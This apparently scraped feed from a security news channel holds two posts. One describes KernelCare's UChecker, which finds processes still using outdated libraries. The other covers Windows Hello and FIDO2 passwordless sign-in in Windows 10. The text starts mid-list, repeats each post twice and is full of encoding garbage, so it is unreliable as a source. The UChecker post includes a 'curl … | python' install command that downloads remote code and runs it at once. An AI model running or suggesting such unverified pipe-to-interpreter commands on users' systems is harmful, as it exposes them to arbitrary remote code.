5) This practice can be just as devastating as rebooting.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) https://github.com/cloudlinux/kcare-uchecker
2) # curl -s -L https://kernelcare.com/checker | python
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is UChecker ?
1) UChecker, short for Userspace Checker, is a free open source scanner that detects which of your processes are still using outdated libraries and need to be restarted.
The tool was created by KernelCare during live patching development for shared libraries.
With Uchecker, you can identify vulnerable FOSS libraries and fix them.
2) You will have to reboot the affected processes (unless you are using the library update services without rebooting), but by scanning for vulnerabilities, you can determine which processes need attention and which do not.
3) As a result, you avoid unnecessary server reboots that lead to degraded service and / or crashes, as well as creating access vulnerabilities, since libraries are left unpatched until a reboot is scheduled.
4) In fact, you may not even know which services are using which libraries, so it is tempting to just reboot the server to update everything, or restart the core services.
5) This practice can be just as devastating as rebooting.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) https://github.com/cloudlinux/kcare-uchecker
2) # curl -s -L https://kernelcare.com/checker | python
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - cloudlinux/kcare-uchecker: A simple tool to detect outdated shared libraries
A simple tool to detect outdated shared libraries. Contribute to cloudlinux/kcare-uchecker development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Windows 10 update removes the need to remember passwords with Windows Hello and FIDO2:
Say goodbye to passwords
Microsoft knows what everyone thinks about passwords, noting that "no one likes passwords (except hackers)."
Since the advent of the computer systems that we all use, we have had to remember passwords - for computer systems, websites, applications, devices, and the like.
βPeople don't like passwords because we have to remember them,β Microsoft explained.
"As a result, we often create passwords that are easy to guess β making them the first target for hackers trying to gain access to your computer or network."
The need for confidentiality meant passwords for everything.
This increased need has led to different types of passwords.
Instead of your birthday, anniversary, dog name, street name, etc., you were forced to remember more complex passwords or have a password manager.
π¦Windows Hello and FIDO2 integration :
You can take advantage of Windows Hello with FIDO2 by updating Windows 10 to version 1903.
Microsoft Edge, Google Chrome and Mozilla Firefox will support biometrics and PINs.
Other Microsoft products such as Office 365, Skype, and Xbox Live can also authenticate using Windows Hello.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Windows 10 update removes the need to remember passwords with Windows Hello and FIDO2:
Say goodbye to passwords
Microsoft knows what everyone thinks about passwords, noting that "no one likes passwords (except hackers)."
Since the advent of the computer systems that we all use, we have had to remember passwords - for computer systems, websites, applications, devices, and the like.
βPeople don't like passwords because we have to remember them,β Microsoft explained.
"As a result, we often create passwords that are easy to guess β making them the first target for hackers trying to gain access to your computer or network."
The need for confidentiality meant passwords for everything.
This increased need has led to different types of passwords.
Instead of your birthday, anniversary, dog name, street name, etc., you were forced to remember more complex passwords or have a password manager.
π¦Windows Hello and FIDO2 integration :
You can take advantage of Windows Hello with FIDO2 by updating Windows 10 to version 1903.
Microsoft Edge, Google Chrome and Mozilla Firefox will support biometrics and PINs.
Other Microsoft products such as Office 365, Skype, and Xbox Live can also authenticate using Windows Hello.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β